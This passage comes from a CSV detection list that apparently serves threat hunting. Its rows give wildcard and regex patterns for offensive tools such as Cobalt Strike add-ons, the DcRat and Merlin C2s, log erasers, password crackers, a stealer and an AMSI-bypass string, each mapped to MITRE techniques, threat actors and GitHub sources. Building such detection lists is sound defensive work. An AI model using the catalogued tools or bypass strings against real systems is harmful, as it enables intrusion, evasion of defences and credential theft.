T1560.001 - T1021.005","TA0005 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","base64","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*QAX-A-Team/EventCleaner*",".{0,1000}QAX\-A\-Team\/EventCleaner.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*qtc-de/remote-method-guesser*",".{0,1000}qtc\-de\/remote\-method\-guesser.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*QUAPCInjectAsSystem*",".{0,1000}QUAPCInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectElevated*",".{0,1000}QUAPCInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. 
The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectWithoutPid*",".{0,1000}QUAPCInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","22","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*quentinhardy*msdat*",".{0,1000}quentinhardy.{0,1000}msdat.{0,1000}","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool 
that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","9","803","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" "*quser.x64.o*",".{0,1000}quser\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*quser.x86.o*",".{0,1000}quser\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*QW1zaVNjYW5CdWZmZXI=*",".{0,1000}QW1zaVNjYW5CdWZmZXI\=.{0,1000}","offensive_tool_keyword","base64","AMSI Bypass AmsiScanBuffer in base64","T1562.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*qwqdanchun*",".{0,1000}qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*qwqdanchun/DcRat*",".{0,1000}qwqdanchun\/DcRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*",".{0,1000}QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA.{0,1000}","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - 
TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*QXh4OEF4eDhBeHg4QXh4OA==*",".{0,1000}QXh4OEF4eDhBeHg4QXh4OA\=\=.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*r00t0v3rr1d3/merlin*",".{0,1000}r00t0v3rr1d3\/merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*r00t-3xp10it*",".{0,1000}r00t\-3xp10it.{0,1000}","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*r00t-3xp10it/venom/master/bin/void.zip*",".{0,1000}r00t\-3xp10it\/venom\/master\/bin\/void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*r0oth3x49/ghauri*",".{0,1000}r0oth3x49\/ghauri.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*r0oth3x49/Tor.git*",".{0,1000}r0oth3x49\/Tor\.git.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data 
Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*r0oth3x49@gmail.com*",".{0,1000}r0oth3x49\@gmail\.com.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*r1cksec/thoth*",".{0,1000}r1cksec\/thoth.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*r2pm -i dirtycow*",".{0,1000}r2pm\s\-i\sdirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*r3F0rM47(listt*",".{0,1000}r3F0rM47\(listt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*r4wd3r/RID-Hijacking*",".{0,1000}r4wd3r\/RID\-Hijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*r4wd3r/Suborner*",".{0,1000}r4wd3r\/Suborner.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account 
Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Radare2*",".{0,1000}Radare2.{0,1000}","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","19645","2938","2024-05-01T18:02:45Z","2012-07-03T07:42:26Z" "*radius2john.pl*",".{0,1000}radius2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*radius2john.py*",".{0,1000}radius2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*RagingRotator-main.*",".{0,1000}RagingRotator\-main\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential 
Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*RAI/ase_docker*",".{0,1000}RAI\/ase_docker.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-attack-servers.*",".{0,1000}rai\-attack\-servers\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Raikia/SMBCrunch*",".{0,1000}Raikia\/SMBCrunch.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*RainbowCrack*",".{0,1000}RainbowCrack.{0,1000}","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. 
visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rai-redirector-dns*",".{0,1000}rai\-redirector\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-redirector-http*",".{0,1000}rai\-redirector\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*raiseChild.py -target-exec *",".{0,1000}raiseChild\.py\s\-target\-exec\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*raiseChild.py*",".{0,1000}raiseChild\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
